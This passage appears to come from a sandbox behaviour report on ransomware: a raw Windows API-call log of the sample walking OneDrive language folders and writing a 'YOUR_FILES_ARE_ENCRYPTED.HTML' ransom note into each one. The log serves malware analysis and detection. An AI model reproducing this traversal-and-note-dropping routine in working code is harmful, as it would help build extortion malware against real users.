nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.592] CloseHandle (hObject=0x594) returned 1 [0161.592] GetProcessHeap () returned 0x270000 [0161.593] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.593] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab191350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab3a6690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab3a6690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="is", cAlternateFileName="")) returned 1 [0161.593] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is") returned 74 [0161.593] GetProcessHeap () returned 0x270000 [0161.593] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.593] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is" [0161.593] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is\\*" [0161.593] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab191350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab3a6690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab3a6690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.786] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab191350, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab3a6690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab3a6690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.786] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab3a6690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab3a6690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab3a6690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.786] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.786] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 
[0161.786] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.786] lstrlenW (lpString=".mui") returned 4 [0161.786] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.786] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab3a6690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab3a6690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab3a6690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.786] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.786] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\is\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\is\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.798] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.801] CloseHandle (hObject=0x5b8) returned 1 [0161.802] GetProcessHeap () returned 0x270000 [0161.802] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.804] 
FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa3e90c70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4033b90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4033b90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="it", cAlternateFileName="")) returned 1 [0161.804] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it") returned 74 [0161.805] GetProcessHeap () returned 0x270000 [0161.805] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.806] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it" [0161.806] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it\\*" [0161.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa3e90c70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4033b90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4033b90, ftLastWriteTime.dwHighDateTime=0x1d709b9, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.806] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa3e90c70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4033b90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4033b90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.807] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4033b90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4033b90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4033b90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.807] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.807] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.807] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.807] lstrlenW (lpString=".mui") returned 4 [0161.807] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.807] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4033b90, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4033b90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4033b90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.807] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.808] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\it\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\it\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.808] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.811] CloseHandle (hObject=0x5b8) returned 1 [0161.811] GetProcessHeap () returned 0x270000 [0161.812] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.812] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4033b90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4222d70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4222d70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="iu-latn-ca", cAlternateFileName="IU-LAT~1")) returned 1 [0161.812] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca") returned 82 [0161.812] GetProcessHeap () returned 0x270000 [0161.812] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.812] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca" [0161.812] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca\\*" [0161.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4033b90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4222d70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4222d70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.813] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4033b90, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4222d70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4222d70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.813] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4222d70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4222d70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4222d70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x118a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.813] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca\\FileSync.LocalizedResources.dll.mui") returned 118 [0161.813] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.813] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.813] lstrlenW (lpString=".mui") returned 4 [0161.813] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.813] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4222d70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4222d70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4222d70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x118a8, dwReserved0=0x0, dwReserved1=0x0, 
cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.813] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.813] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0161.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\iu-latn-ca\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\iu-latn-ca\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.814] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.816] CloseHandle (hObject=0x5b8) returned 1 [0161.817] GetProcessHeap () returned 0x270000 [0161.818] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.818] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4222d70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa44aa4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa44aa4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ja", cAlternateFileName="")) returned 1 [0161.818] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja") returned 74 [0161.818] GetProcessHeap () returned 0x270000 [0161.818] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.818] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja" [0161.818] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja\\*" [0161.818] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4222d70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa44aa4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa44aa4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.819] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4222d70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa44aa4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa44aa4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 
cFileName="..", cAlternateFileName="")) returned 1 [0161.819] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa44aa4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa44aa4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa44aa4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xe0a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.819] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.819] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.819] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.819] lstrlenW (lpString=".mui") returned 4 [0161.819] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.819] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa44aa4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa44aa4d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa44aa4d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xe0a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.819] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.819] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ja\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.820] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.822] CloseHandle (hObject=0x5b8) returned 1 [0161.823] GetProcessHeap () returned 0x270000 [0161.824] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.824] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa44aa4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4673550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4673550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ka", cAlternateFileName="")) returned 1 [0161.824] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka") returned 74 [0161.824] GetProcessHeap () returned 0x270000 [0161.824] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.824] lstrcpyW (in: lpString1=0x74d2010, 
